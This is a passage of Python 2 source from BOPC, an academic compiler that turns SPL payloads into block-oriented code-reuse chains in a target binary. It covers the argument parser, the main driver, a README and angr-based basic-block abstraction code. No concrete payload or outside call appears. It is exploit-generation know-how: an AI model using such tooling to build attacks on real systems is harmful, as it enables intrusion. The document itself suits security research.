'abstractions', required = False ) group_g.add_argument( "--emit-IR", help = "Dump SPL IR to a file and exit", action = 'store_const', const = True, dest = 'emit_IR', required = False ) # action='count' 
group_g.add_argument( '-d', help = "Set debugging level to minimum", action = 'store_const', const = DBG_LVL_1, dest = 'dbg_lvl', required = False ) group_g.add_argument( '-dd', help = "Set debugging level to basic (recommended)", action = 'store_const', const = DBG_LVL_2, dest = 'dbg_lvl', required = False ) group_g.add_argument( '-ddd', help = "Set debugging level to verbose (DEBUG ONLY)", action = 'store_const', const = DBG_LVL_3, dest = 'dbg_lvl', required = False ) group_g.add_argument( '-dddd', help = "Set debugging level to print-everything (DEBUG ONLY)", action = 'store_const', const = DBG_LVL_4, dest = 'dbg_lvl', required = False ) group_g.add_argument( '-V', "--version", action = 'version', version = 'BOPC %s' % VERSION ) # ------------------------------------------------------------------------- # Group for searching arguments # ------------------------------------------------------------------------- group_s.add_argument( '-s', "--source", help = "Source file with SPL payload", action = 'store', dest = 'source', required = False ) group_s.add_argument( '-e', "--entry", help = "The entry point in the binary that payload starts", action = 'store', dest = 'entry', required = False ) group_s.add_argument( '-O', "--optimizer", help = "Use the SPL optimizer (Default: none)", choices = ['none', 'ooo', 'rewrite', 'full'], action = 'store', default = 'none', dest = 'optimizer', required = False ) group_s.add_argument( '-f', "--format", help = "The format of the solution (Default: raw)", choices = ['raw', 'idc', 'gdb'], action = 'store', default = 'raw', dest = 'format', required = False, ) group_s.add_argument( "--find-all", help = "Find all the solutions", action = 'store_const', default = 'one', const = 'all', dest = 'findall', required = False ) # ------------------------------------------------------------------------- # Group for debugging arguments # ------------------------------------------------------------------------- group_d.add_argument( 
"--mapping-id", help = "Run the Trace Searching algorithm on a given mapping ID", metavar = 'ID', action = 'store', default = -1, dest = 'mapping_id', required = False ) group_d.add_argument( "--mapping", help = "Run the Trace Searching algorithm on a given register mapping", metavar = 'MAP', nargs = '+', action = 'store', default = [], dest = 'mapping', required = False ) group_d.add_argument( "--enum-mappings", help = "Enumerate all possible mappings and exit", action = 'store_const', default = False, const = True, dest = 'enum_mappings', required = False ) group_d.add_argument( "--abstract-blk", help = "Abstract a specific basic block and exit", metavar = 'BLKADDR', action = 'store', dest = 'absblk', required = False ) # ------------------------------------------------------------------------- # Group for application capabilities # ------------------------------------------------------------------------- group_c.add_argument( '-c', "--capability", help = textwrap.dedent('''\ Measure application's capability. Options (can be many) all\tSearch for all Statements regset\tSearch for Register Assignments regmod\tSearch for Register Modifications memrd\tSearch for Memory Reads memwr\tSearch for Memory Writes call\tSearch for Function/System Calls cond\tSearch for Conditional Jumps load\tLoad capabilities from file save\tSave capabilities to file noedge\tDump statements and exit (don't calculate edges)'''), choices = ['all', 'regset', 'regmod', 'memrd', 'memwr', 'call', 'cond', 'save', 'load', 'noedge'], metavar = 'OPTIONS', nargs = '+', # consume >=1 arguments (multiple options) action = 'store', dest = 'capabilities', required = False ) if len(sys.argv) == 1: parser.print_help(sys.stderr) sys.exit(1) return parser.parse_args() # do the parsing (+ error handling) # --------------------------------------------------------------------------------------------- # load(): Load the target binary and generate its CFG. 
#
#   :Arg filename: Binary's file name
#   :Ret: The angr project and the generated CFG, as a tuple (project, CFG).
#
def load( filename ):
    # load the binary (exception is thrown if name is invalid)
    project = angr.Project(filename, load_options={'auto_load_libs': False})

    # generate CFG
    dbg_prnt(DBG_LVL_0, "Generating CFG. It might take a while...")
    CFG = project.analyses.CFGFast()
    dbg_prnt(DBG_LVL_0, "CFG generated.")

    # normalize CFG (i.e. make sure that there are no overlapping basic blocks)
    dbg_prnt(DBG_LVL_0, "Normalizing CFG...")
    CFG.normalize()

    # normalize every function object as well
    for _, func in project.kb.functions.iteritems():
        if not func.normalized:
            dbg_prnt(DBG_LVL_4, "Normalizing function '%s' ..." % func.name)
            func.normalize()

    dbg_prnt(DBG_LVL_0, "Done.")

    emph("CFG has %s nodes and %s edges" %
         (bold(len(CFG.graph.nodes())), bold(len(CFG.graph.edges()))))

    # create a quick mapping between addresses and nodes (basic blocks)
    for node in CFG.graph.nodes():
        ADDR2NODE[ node.addr ] = node

    # create a quick mapping between basic block addresses and their corresponding functions
    for _, func in CFG.functions.iteritems():       # for each function
        for addr in func.block_addrs:               # for each basic block in that function
            ADDR2FUNC[ addr ] = func

    return project, CFG

# ---------------------------------------------------------------------------------------------
# abstract(): Abstract the CFG and apply any further abstraction-related operations.
#
#   :Arg mark:     A valid graph marking object.
#   :Arg mode:     Abstraction mode (load, save, saveonly, none)
#   :Arg filename: Abstraction's file name (if applicable)
#   :Ret: 0 on success; -1 when mode is 'saveonly' (nothing more to do afterwards).
#
def abstract( mark, mode, filename ):
    if mode == 'none':
        mark.abstract_cfg()                         # calculate the abstractions
    elif mode == 'load':
        mark.load_abstractions(filename)            # simply load the abstractions
    elif mode == 'save':
        mark.abstract_cfg()                         # calculate the abstractions
        mark.save_abstractions(filename)            # and save them
    elif mode == 'saveonly':
        mark.abstract_cfg()
        mark.save_abstractions(filename)
        return -1

    return 0

# ---------------------------------------------------------------------------------------------
# capability_analyses(): Apply any (custom) analyses to the capabilities.
#
#   :Arg cap: The capability object
#   :Ret: None.
#
def capability_analyses( cap ):
    dbg_prnt(DBG_LVL_0, 'Applying additional Capability analyses...')

    return '''
    # analyze all islands
    # cap.analyze(P.CAP_LOOPS, P.CAP_STMT_MIN_DIST)

    # analyze a specific island
    # cap.analyze_island(0x400885, P.CAP_STMT_COMB_CTR)

    i = 0
    def foo( graph ):
        global i

        print 'Visualizing island %d' % i
        cap.visualize(graph, 'island_%d' % i, show_labels=True)
        i += 1

        for _, d in graph.nodes_iter(data=True):
            print d['type']                 # check capability.__add() for all keys

    # apply the callback to every island
    cap.callback( foo )
    '''

# -------------------------------------------------------------------------------------------------
# main(): This is the main function of BOPC.
#
#   :Ret: None.
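The mode dispatch in abstract() is small enough to exercise in isolation. A minimal sketch, assuming a hypothetical `MarkStub` in place of the real mark.py object (the stub and its recorded call log are illustration only):

```python
# Minimal sketch of the abstract() mode dispatch. A stub object records which
# operations were requested; 'saveonly' returns -1 so the caller knows to stop
# after dumping the abstractions.

class MarkStub(object):
    """Hypothetical stand-in for the mark.py object; records calls only."""
    def __init__(self):
        self.calls = []
    def abstract_cfg(self):
        self.calls.append('abstract')
    def load_abstractions(self, filename):
        self.calls.append('load:' + filename)
    def save_abstractions(self, filename):
        self.calls.append('save:' + filename)

def abstract(mark, mode, filename):
    if mode == 'none':
        mark.abstract_cfg()                 # compute abstractions in memory
    elif mode == 'load':
        mark.load_abstractions(filename)    # reuse previously saved ones
    elif mode == 'save':
        mark.abstract_cfg()
        mark.save_abstractions(filename)    # compute, then persist
    elif mode == 'saveonly':
        mark.abstract_cfg()
        mark.save_abstractions(filename)
        return -1                           # signal: nothing more to do
    return 0

m = MarkStub()
assert abstract(m, 'saveonly', 'a.out') == -1
assert m.calls == ['abstract', 'save:a.out']
```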
# if __name__ == '__main__': args = parse_args() # process arguments set_dbg_lvl( args.dbg_lvl ) # set debug level in coreutils now = datetime.datetime.now() # get current time # ------------------------------------------------------------------------- # Display banner # ------------------------------------------------------------------------- print rainbow(textwrap.dedent(''' %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % % % ::::::::: :::::::: ::::::::: :::::::: % % :+: :+: :+: :+: :+: :+: :+: :+: % % +:+ +:+ +:+ +:+ +:+ +:+ +:+ % % +#++:++#+ +#+ +:+ +#++:++#+ +#+ % % +#+ +#+ +#+ +#+ +#+ +#+ % % #+# #+# #+# #+# #+# #+# #+# % % ######### ######## ### ######## % % % % Block Oriented Programming Compiler % % % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ''')) print comments print "[*] Starting BOPC %s at %s" % (VERSION, bolds(now.strftime("%d/%m/%Y %H:%M"))) # ------------------------------------------------------------------------- # BOPC operation: Emit SPL IR # ------------------------------------------------------------------------- if args.emit_IR and args.source: IR = C.compile(args.source) IR.compile() # compile the SPL payload IR = O.optimize(IR.get_ir()) IR.optimize(mode=args.optimizer) # optimize IR (if needed) IR.emit(args.source) # ------------------------------------------------------------------------- # BOPC operation: Trace Search # ------------------------------------------------------------------------- elif args.source and args.entry: IR = C.compile(args.source) IR.compile() # compile the SPL payload IR = O.optimize(IR.get_ir()) IR.optimize(mode=args.optimizer) # optimize IR (if needed) project, CFG = load(args.binary) mark = M.mark(project, CFG, IR, 'puts') if abstract(mark, args.abstractions, args.binary) > -1: entry = int(args.entry, 0) # get entry point X = mark.mark_candidate(sorted(map(lambda s : tuple(s.split('=')), args.mapping))) if not X: print 'abort'; exit() # visualize('cfg_cand', 
        #           entry=entry, options=VO_DRAW_CFG|VO_DRAW_CANDIDATE)

        # extract payload name (without the extension)
        payload_name = ntpath.basename(args.source)
        payload_name = os.path.splitext(payload_name)[0]

        try:
            options = {
                'format'     : args.format,
                'solutions'  : args.findall,
                'mapping-id' : int(args.mapping_id),
                'mapping'    : sorted(map(lambda s : tuple(s.split('=')), args.mapping)),
                'filename'   : '%s-%s' % (args.binary, payload_name),
                'enum'       : args.enum_mappings,
                'simulate'   : False,
                '#mappings'  : 0,
                '#solutions' : 0
            }
        except ValueError:
            fatal("'mapping' argument must be an integer")

        tsearch = S.search(project, CFG, IR, entry, options)
        tsearch.trace_searching(mark)

        # -----------------------------------------------------------------
        # Show some statistics
        # -----------------------------------------------------------------
        emph("Trace Searching Statistics:")
        emph("\tUsed Simulation? %s"  % bolds(options['simulate']))
        emph("\t%s Mapping(s) tried"  % bold(options['#mappings']))
        emph("\t%s Solution(s) found" % bold(options['#solutions']))

    # -------------------------------------------------------------------------
    # BOPC operation: Dump abstractions
    # -------------------------------------------------------------------------
    elif args.abstractions == 'saveonly':
        # IR is useless; we're only dumping abstractions
        project, CFG = load(args.binary)

        mark = M.mark(project, CFG, None, 'puts')
        abstract(mark, args.abstractions, args.binary)

    # -------------------------------------------------------------------------
    # BOPC operation: Application Capability
    # -------------------------------------------------------------------------
    elif args.capabilities:
        # IR is useless; we're measuring capability
        project, CFG = load(args.binary)

        mark = M.mark(project, CFG, None, 'puts')
        abstract(mark, args.abstractions, args.binary)  # cfg is loaded with abstractions

        cap = P.capability(CFG, args.binary)

        options = 0
        for stmt in args.capabilities:
            options = options | {
                'all'    : P.CAP_ALL,
                'regset' : P.CAP_REGSET,
                'regmod' : P.CAP_REGMOD,
                'memrd'  : P.CAP_MEMRD,
                'memwr'  : P.CAP_MEMWR,
                'call'   : P.CAP_CALL,
                'cond'   : P.CAP_COND,
                'load'   : P.CAP_LOAD,
                'save'   : P.CAP_SAVE,
                'noedge' : P.CAP_NO_EDGE
            }[stmt]                         # argparse ensures no KeyError

        cap.build(options=options)          # build the Capability Graph
        cap.save()                          # save nodes to a file
        cap.explore()                       # explore Islands

        capability_analyses( cap )

    # -------------------------------------------------------------------------
    # BOPC operation: Single block abstraction
    # -------------------------------------------------------------------------
    elif args.binary and args.absblk:
        project = angr.Project(args.binary, load_options={'auto_load_libs': False})
        load(args.binary)

        abstr = A.abstract_ng(project, int(args.absblk, 0))

        dbg_prnt(DBG_LVL_0, 'Abstractions for basic block 0x%x:' % int(args.absblk, 0))

        for a, b in abstr:
            if a == 'regwr':
                dbg_prnt(DBG_LVL_0, '%14s :' % a)

                for c, d in b.iteritems():
                    dbg_prnt(DBG_LVL_0, '\t\t%s = %s' % (c, str(d)))
            else:
                dbg_prnt(DBG_LVL_0, '%14s : %s' % (a, str(b)))

    # -------------------------------------------------------------------------
    # invalid BOPC operation
    # -------------------------------------------------------------------------
    else:
        fatal('Invalid configuration argument')

    emph('')
    emph('BOPC has finished.', DBG_LVL_0)
    emph('Have a nice day!',  DBG_LVL_0)
    emph('Bye bye :)',        DBG_LVL_0)

    warn('A segmentation fault may occur now, due to an internal angr issue')

# ---------------------------------------------------------------------------------------


================================================
FILE: source/README.md
================================================
# Block Oriented Programming Compiler (BOPC)
___

### BOPC Implementation Overview

![alt text](./images/BOPC_overview.png)

### Source Code Overview

| File                              | Description                            |
| ----------------------------------|----------------------------------------|
| [BOPC.py](./BOPC.py)              | Main file                              |
| [absblk.py](./absblk.py)          | Basic block abstraction                |
| [calls.py](./calls.py)            | Supported library and system calls     |
| [capability.py](./capability.py)  | Application Capability                 |
| [compile.py](./compile.py)        | SPL compiler                           |
| [config.py](./config.py)          | Configuration file                     |
| [coreutils.py](./coreutils.py)    | Shared utils across modules            |
| [delta.py](./delta.py)            | Delta graph                            |
| [map.py](./map.py)                | Mapping across registers and variables |
| [mark.py](./mark.py)              | Marking and re-Marking CFG             |
| [optimize.py](./optimize.py)      | SPL optimizer                          |
| [output.py](./output.py)          | Write solutions to a file              |
| [path.py](./path.py)              | CFG shortest paths                     |
| [search.py](./search.py)          | Trace Searching algorithm              |
| [simulate.py](./simulate.py)      | Concolic execution                     |

___


================================================
FILE: source/absblk.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#   [ BOPC ASCII-art banner ]
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#   Kyriakos Ispoglou (ispo) - ispo@purdue.edu
#   PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# absblk.py:
#
# This module implements the basic block "abstractions". Abstraction is a process that summarizes
# a basic block into the "impact" on program's state.
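Before the field-by-field documentation below, it helps to see what such a summary might look like. A hypothetical abstraction for a block like `mov rax, 1337 ; add r9, 1`, following the regwr layout this module documents (all values made up for illustration):

```python
# Hypothetical abstraction for "mov rax, 1337; add r9, 1": rax gets a
# 'concrete' value (1337 is not a writable address), r9 a 'mod' entry.
abstraction = {
    'regwr': {
        'rax': {'type': 'concrete', 'const': 1337, 'writable': False},
        'r9' : {'type': 'mod', 'op': '+', 'const': 1},
    },
    'memrd': set(),     # no memory reads in this block
    'memwr': set(),     # no memory writes either
    'call' : {},        # the block does not end in a call
    'cond' : {},        # ... nor in a conditional jump
}

# a functional block for an SPL statement "rax = 1337" must set rax concretely
assert abstraction['regwr']['rax']['type'] == 'concrete'
assert abstraction['regwr']['r9']['op'] == '+'
```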
# # ------------------------------------------------------------------------------------------------- from coreutils import * import signal import simuvex import claripy import archinfo import angr # ------------------------------------------------------------------------------------------------ # Constant Definitions # ------------------------------------------------------------------------------------------------ _STACK_SZ = 0x1000 # size of symbolic stack # ------------------------------------------------------------------------------------------------- # abstract_ng: This class implements the next generation of the basic block "abstraction". So # far, the following abstractions are supported: # # * * Register Writes * * # A dictionary that contains all registers that are being written. The "write" information is # another dictionary with the following fields: # # * type : Can be 'concrete', 'deref', 'mod' or 'clob'. A register is of type 'clob' # when, it does not fall to any of the other types # * const : ('concrete' and 'mod' types). The constant value that is written to the # register # * writable : ('concrete' types). If the constant value is a valid and writable memory # address, then this field is set to True # * op : ('mod' types). The modification operator # * addr : ('deref' types). The address that register value is loaded from # * deps : ('deref' types). Any registers that participate in addr field # * sym : ('deref' types). A mapping between registers and their symbolic variables # * memrd : ('deref' types). When the register write can be used as a memory read, this # field contains the size of the memory read in bytes (1,2,4,8). 
Otherwise it # is set to None # # Example: # regwr = { # rsp : {'type': 'concrete', 'const': 576460752303357888L, 'writable': True }, # rcx : {'type': 'deref', 'addr': , 'deps': ['rsi']}, # r9 : {'type': 'mod', 'op': '+', 'const': 1337L} # } # # # * * Memory Reads * * # A list of tuples (address, size) for every memory read. # # Example: # memrd = set([(>, 64), (>, 64)]) # # # * * Memory Writes * * # A list of tuples (address, data) for every memory write (len(data) indicates the size) # # Example: # memwr = set([(>, >), # (>, >)]) # # # * * Concrete Writes * * # A list of tuples (address, size) for every concrete memory write. # # Example: # conwr = set([(576460752303359992L, 64), (576460752303359968L, 64)]) # # # * * SPL Memory Writes * * # A list of dictionaries for every SPL memory write (memory writes that are in the form: # "mov [rax], rbx"). Each dictionary contains the following fields: # # * mem : The register that holds the address to write (string) # * val : The register that holds the value to be written (string) # * size : The number of bytes to write (e.g., mov [rax], cl, mov [rbx], dx) # * sym : A mapping between registers and their symbolic variables # # Example: # splmemwr = [{ # 'mem' : 'rbx', # 'val' : 'rax', # 'size' : 4, # 'sym' : {'rax': , 'rbx': } # }] # # # * * Calls * * # A dictionary with the following fields: # # * type : Can be 'syscall', or 'libcall' # * name : The name of the call # # Example: # call = {'type': 'libcall', 'name': u'puts'} # # # * * Conditional Jumps * * # A dictionary with the following fields: # # * form : The form of the conditional jump ('simple' / 'extended') # * reg : The register that participates in the conditional jump # * const : The constant value that register is compared against # * op : The comparison operator # * mod_op : ('extended' types). The operator of the register modification # * mod_const : ('extended' types). 
The constant of the register modification # # Example: # cond = {'reg': 'r11', 'op': '==', 'const': 11L} # cond = {'mod_op': '^', 'const': 0L, 'form': 'extended', 'op': '=='} # # # * * Symbolic Variables * * # A dictionary that maps the symbolic variables to their actual addresses that they correspond # # Example: # symvar = {' : 0x7fffffffffef1e8} # # # * * * ---===== TODO list =====--- * # # [1]. Make absblk more precise i.e., check the order of memory writes # [2]. Move this list at the beginning of the file. # class abstract_ng( object ): ''' ======================================================================================= ''' ''' AUXILIARY FUNCTIONS ''' ''' ======================================================================================= ''' # --------------------------------------------------------------------------------------------- # __reg_w(): Analyze the register writes of the symbolic execution. # # :Arg state: Program's state after symbolic execution # :Ret: None. 
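A toy version of the classification that __reg_w() performs below: concrete values first, then simple "reg = reg op const" modifications, then everything else is clobbering. The hand-made action records here are an assumption for illustration; the real code inspects claripy ASTs instead:

```python
# Toy register-write classification mirroring __reg_w()'s decision order.
# Purely illustrative: records like {'concrete': True, 'value': 1337} stand
# in for the symbolic-execution actions the real code examines.

def classify(action):
    if action.get('concrete'):
        # register gets a constant -> 'concrete' entry
        return {'type': 'concrete', 'const': action['value']}
    if action.get('op') and action.get('same_reg'):
        # expression of the form "<reg> = <reg> <op> <const>" -> 'mod' entry
        return {'type': 'mod', 'op': action['op'], 'const': action['const']}
    return {'type': 'clob'}     # anything else: register is clobbered

assert classify({'concrete': True, 'value': 1337})['type'] == 'concrete'
assert classify({'op': '+', 'const': 1, 'same_reg': True})['type'] == 'mod'
assert classify({})['type'] == 'clob'
```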
# def __reg_w( self, state ): visited = set() # visited registers for action in reversed(state.actions): # for every action (start backwards) if not (action.type == 'reg' and action.action == 'write'): continue # we care about register writes only try: # we only care about the most recent register write only reg = self.__proj.arch.register_names[action.offset] except KeyError: continue # get the last write only if reg not in HARDWARE_REGISTERS or reg in visited: continue data = { } # various data related to the write visited.add(reg) # make sure that you won't visit this again # --------------------------------------------------------------------------- # If some address (initialized or not) is used as a dereference, the regwr # entry for that register must be preserved (we should not overwrite register # with the actual value in that address) # --------------------------------------------------------------------------- if reg in self.regwr and self.regwr[ reg ]['type'] == 'deref': continue # The register is being modified, so we start by marking it as clobbering if reg not in self.regwr: self.regwr[ reg ] = {'type' : 'clob'} # ----------------------------------------------------------------- if action.data.concrete: # if register gets a concrete value, value = state.se.eval(action.data) # concretize it data['type'] = 'concrete' # set data data['const'] = value data['writable'] = True # initialize this first in_section = False # now, check whether this value is a writable address try: # The problem: There are some weird sections (.e.g., ".comment") whose VA # starts from 0. Therefore, we may have register writes with constants like # 1, 2 and so on, which are marked as +W. This means that at the end we can # have memory reservations (writes) at those addresses. Our old approach with # "state.memory.permissions(value)" doesn't work here. 
                #
                # So iterate over ELF sections looking for it
                for _, sec in self.__proj.loader.main_object.sections_map.iteritems():
                    # it's possible for the value to be part of >1 sections (usually when
                    # section's VA is 0; sec.vaddr != 0). We mark value as +W only when *all*
                    # sections are writable
                    if sec.contains_addr(value):
                        data['writable'] &= sec.is_writable
                        in_section = True

                # if we can't find the section (b/c it's generated at runtime, like .stack)
                if not in_section:
                    # TODO: check if value+1, value+2, etc. are writable as well
                    rwx = state.memory.permissions(value)

                    if state.se.eval(rwx) & 2 == 2:     # is +W (2nd bit) set?
                        data['writable'] = True
                    else:
                        data['writable'] = False

            except Exception, e:                        # page does not exist at given address
                data['writable'] = False                # not writable at all

                try:
                    # special case when a stack address is in the next page (-W)
                    if value & 0x07ffffffffff0000 == 0x07ffffffffff0000:
                        rwx = state.memory.permissions(value - 0x4000)  # give it a second chance

                        if state.se.eval(rwx) & 2 == 2:
                            data['writable'] = True
                except Exception, e:                    # or angr.errors.SimMemoryError
                    pass

            # -----------------------------------------------------------------
            else:                               # register doesn't get a concrete value
                # register gets an expression.
Check for simple register modifications: # " = " (we can easily scale this to = ) # Note that modified register should be the same with action.offset node = [leaf for leaf in action.data.recursive_leaf_asts] # we need an AST with depth 2, 2 leaves and 1 variable (i.e., register) if action.data.depth == 2 and len(action.data.variables) == 1 and len(node) == 2: try: data['op'] = { # cast operator '__add__' : '+', '__sub__' : '-', '__mul__' : '*', '__div__' : '/', '__and__' : '&', '__or__' : '|', '__xor__' : '^', '__invert__' : '~', '__lshift__' : '<<', '__rshift__' : '>>' }[ action.data.op ] # if constant is on the left, swap sides if node[0].op == 'BVV' and node[0].concrete: node[0], node[1] = node[1], node[0] # check if we're in the form: if node[0].op == 'BVS' and self.__symreg[node[0]] == reg and \ node[1].op == 'BVV' and node[1].concrete: data['type'] = 'mod' data['const'] = state.se.eval(node[1]) else: # not in the right form continue except KeyError: # __symreg() threw an exception continue # ----------------------------------------------------------------------- # Consider the following case: # .text:000000000040BA49 mov eax, [rbp+tfd] # .text:000000000040BA52 mov edi, eax ; fd # # Here, edi gets exactly the same value with eax, but edi is marked as # 'clob', while eax as 'deref'. The root cause is that edi does not # participate in any memory reads and the assigned value is not constant # (i.e., it doesn't come directly from a register). # # To fix that we check whether a 'clob' register has *exactly* the same # symbolic value with another one (eax in our example), and if so we # assign the same regwr entry to it. 
# ----------------------------------------------------------------------- else: # iterate over previous writes for reg2, val in self.__reg_rawval.iteritems(): try: # check if raw values match if reg != reg2 and val.shallow_repr() == action.data.shallow_repr(): self.regwr[ reg ] = self.regwr[ reg2 ] pass except KeyError: pass # ----------------------------------------------------------------- if data: self.regwr[ reg ] = data # set data to this register # --------------------------------------------------------------------------------------------- # __mem_r(): Analyze the memory reads of the symbolic execution. # # :Arg state: Program's state after symbolic execution # :Ret: None. # def __mem_r( self, state ): for action in state.actions: # for every action if not (action.type == 'mem' and action.action == 'read'): continue # we care about memory reads only # simply add address (can be an expression) and size to the list self.memrd.add( (action.addr, len(action.data)) ) # --------------------------------------------------------------------------------------------- # __mem_w(): Analyze the memory writes of the symbolic execution. # # :Arg state: Program's state after symbolic execution # :Ret: None. 
# def __mem_w( self, state ): for action in state.actions: # for every action if not (action.type == 'mem' and action.action == 'write'): continue # we care about memory writes only # simply add address (can be an expression) and data to the list self.memwr.add( (action.addr, action.data) ) if action.addr.concrete: # if address is concrete # concretize it as well self.conwr.add( (state.se.eval(action.addr), len(action.data)) ) deps = [ ] symtab = { } # ----------------------------------------------------------------- # Check for memory register writes (mov [rax], rbx) # # In this case, both action.addr and action.data will consist of a # single leaf in their ast which is a register # ----------------------------------------------------------------- mem_reg = [leaf for leaf in action.addr.recursive_leaf_asts] val_reg = [leaf for leaf in action.data.recursive_leaf_asts] # print 'ADDR', mem_reg, action.addr # print 'ADDR', val_reg, action.addr # check AST have a single leaf if len(mem_reg) == 1 and len(val_reg) == 1: mem, val = None, None # check whether the leaf is a register for sym, nam in self.__symreg.iteritems(): # skip registers that are not symbolic (e.g., rbp) if isinstance(sym.args[0], str) and sym.args[0] in mem_reg[0].shallow_repr(): symtab[nam] = sym mem = nam elif isinstance(sym.args[0], str) and sym.args[0] in val_reg[0].shallow_repr(): symtab[nam] = sym val = nam # if both leaves are registers we have a memory register write! if mem and val: self.splmemwr.append({ 'mem' : mem, 'val' : val, 'size' : int(action.size) >> 3, 'sym' : symtab, }) # --------------------------------------------------------------------------------------------- # __call(): Analyze the (sys|lib)calls of the symbolic execution. Because we're analyzing a # single basic block, we can have up to one such (sys|lib)call (the last instruction). # # :Arg state: Program's state after symbolic execution # :Ret: None. 
# def __call( self, state ): blk = self.__proj.factory.block(self.__entry) # check if symbolic execution stopped on a syscall # (don't use "if self.__proj._simos.is_syscall_addr(state.addr)"; it throws exceptions) if blk.vex.jumpkind == "Ijk_Sys_syscall": # a system call was invoked # we assume that simproc.cc == SimCCAMD64LinuxSyscall simproc = self.__proj._simos.syscall(state) self.call['type'] = 'syscall' self.call['name'] = simproc.display_name # self.call['nargs'] = simproc.num_args else: if blk.vex.jumpkind != "Ijk_Call": # skip block when it doesn't end with a call return # check if symbolic execution stopped on a library call for action in reversed(state.actions): # for every action if action.type != 'exit': continue # we care about branches only # concretize function's entry point target = state.se.eval(action.target) # Note: Before you use kb.functions, calculate CFG (e.g., analyses.CFGFast()) try: self.call['type'] = 'libcall' self.call['name'] = self.__proj.kb.functions[target].name except Exception: # no function name at that address self.call = { } # --------------------------------------------------------------------------------------------- # __cond(): Analyze the conditional jump of the symbolic execution. Because we're analyzing a # single basic block, we can have up to one conditional jump. # # :Arg state: Program's state after symbolic execution # :Ret: None. 
# def __cond( self, state ): for action in reversed(state.actions): # for every action if not (action.type == 'exit' and action.exit_type == 'conditional'): continue # we care about conditional jumps only # as in __reg_w(), we only care about simple conditional jumps: " " if len(action.condition.variables) == 1: try: self.cond['op'] = { # cast operator '__eq__' : '==', '__ne__' : '!=', '__le__' : '<=', '__lt__' : '<', '__ge__' : '>=', '__gt__' : '>', 'SGT' : '>', 'SGE' : '>=', 'SLT' : '<', 'SLE' : '<=', 'UGT' : '>', # do not distinguish signed/unsigned operators 'UGE' : '>=', 'ULT' : '<', 'ULE' : '<=', }[ action.condition.op ] except KeyError: warn('Unknown conditional jump operator "%s"' % action.condition.op) self.cond = { } return node = [leaf for leaf in action.condition.recursive_leaf_asts] # ----------------------------------------------------------------------- # Check if we're in the simple form: # ----------------------------------------------------------------------- if len(node) == 2: # we need 2 leaves + 1 operator self.cond['form'] = 'simple' # we're in the simple form try: # swap register and constant if needed if node[1].op == 'BVS' and node[0].op == 'BVV' and node[0].concrete: node[0], node[1] = node[1], node[0] # if we're in the right form (reg and const), we have our condition if node[0].op == 'BVS' and node[1].op == 'BVV' and node[1].concrete: self.cond['reg'] = self.__symreg[node[0]] self.cond['const'] = state.se.eval(node[1]) else: self.cond = { } # not in the right form return except KeyError: # if not in the right form, __symreg() will throw a KeyError exception self.cond = { } return # ----------------------------------------------------------------------- # Check if we're in the extended form: ( ) # (example: ">") # # This is when the iterator (register) gets modified and compared at the # same basic block. 
# ----------------------------------------------------------------------- elif len(node) == 3: # we need 3 leaves and 2 operators self.cond['form'] = 'extended' # we're in the extended form try: # get left and right side of the comparison left, right = action.condition.split( action.condition.op ) # if the constant is on the left side, swap sides if left.op == 'BVV' and left.concrete: left, right = right, left mod_ops = { # register modification operations '__add__' : '+', '__sub__' : '-', '__mul__' : '*', '__div__' : '/', '__and__' : '&', '__or__' : '|', '__xor__' : '^', '__invert__' : '~', '__lshift__' : '<<', '__rshift__' : '>>' } # if the left side is a modification and the right side a constant if left.op in mod_ops and right.op == 'BVV' and right.concrete: self.cond['const'] = state.se.eval(right) self.cond['mod_op'] = mod_ops[ left.op ] reg, const = left.split( left.op ) # if the constant is on the left side, swap sides if reg.op == 'BVV' and reg.concrete: reg, const = const, reg # if the modification uses a constant and a register if reg.op == 'BVS' and reg in self.__symreg and \ const.op == 'BVV' and const.concrete: self.cond['reg'] = self.__symreg[reg] self.cond['mod_const'] = state.se.eval(const) else: self.cond = { } # something is not in the right form return else: self.cond = { } return except ValueError: # != 2 values to split() self.cond = { } return # ----------------------------------------------------------------------- # Otherwise we're not in the right form # ----------------------------------------------------------------------- else: self.cond = { } continue # The problem here, is that simgr sometimes "inverts" the condition, so the # "target" basic block is the block immediately after the current block. To # be consistent, we have to "invert" the operator, so the target basic block # is executed when the jump is taken. 
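The inversion described in the comment above is a small table lookup: when the recorded "taken" target equals the fall-through address, the comparison operator is flipped. A standalone sketch (the addresses are made up):

```python
# Sketch of the operator inversion applied when simgr has "inverted" the
# branch condition: if the recorded taken-target is actually the fall-through
# block, flip the operator so that the target executes when the jump is taken.

INVERT = {'==': '!=', '!=': '==',
          '>' : '<=', '>=': '<',
          '<' : '>=', '<=': '>'}

def fix_condition(op, target, blk_addr, blk_size):
    if target == blk_addr + blk_size:   # target is the next (fall-through) block
        return INVERT[op]               # so flip the operator
    return op

# "taken" target is the fall-through block at 0x400010: '<' becomes '>='
assert fix_condition('<', 0x400010, 0x400000, 0x10) == '>='
# genuine out-of-line target: the operator is kept as-is
assert fix_condition('<', 0x400100, 0x400000, 0x10) == '<'
```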
            blk = self.__proj.factory.block(self.__entry)

            # check if the target is the next block (assume action.target is concrete)
            if state.se.eval(action.target) == blk.addr + blk.size:
                self.cond['op'] = {                 # invert the condition
                    '==' : '!=',    '!=' : '==',
                    '>'  : '<=',    '>=' : '<',
                    '<'  : '>=',    '<=' : '>'
                }[ self.cond['op'] ]

            break                                   # there's up to 1 conditional jump

    # ---------------------------------------------------------------------------------------------
    # __add_sym_vars(): This function extracts all (memory) symbolic variables from an expression.
    #       For instance, given an expression that contains the variable
    #       'mem_7fffffffffef1e8_82_64', we want to map it to its actual address:
    #       0x7fffffffffef1e8.
    #
    #   :Arg addr_expr: The address expression to get variables from
    #   :Ret: None.
    #
    def __add_sym_vars( self, addr_expr ):
        # A memory symbolic variable is in the form: mem_ADDRESS_RANDOM_SIZE. The AST leaf
        # exposes this name through its string form.
        #
        # We want to extract the ADDRESS and SIZE fields
        for leaf in addr_expr.recursive_leaf_asts:  # for each leaf in the AST
            leafstr = leaf.shallow_repr()           # cast it to string

            # if leaf is a memory variable, extract its address and its size
            if re.search(r'mem_[0-9a-f]+_[0-9]+_[0-9]+', leafstr):
                _, addr, rand, size = leafstr.split('_')

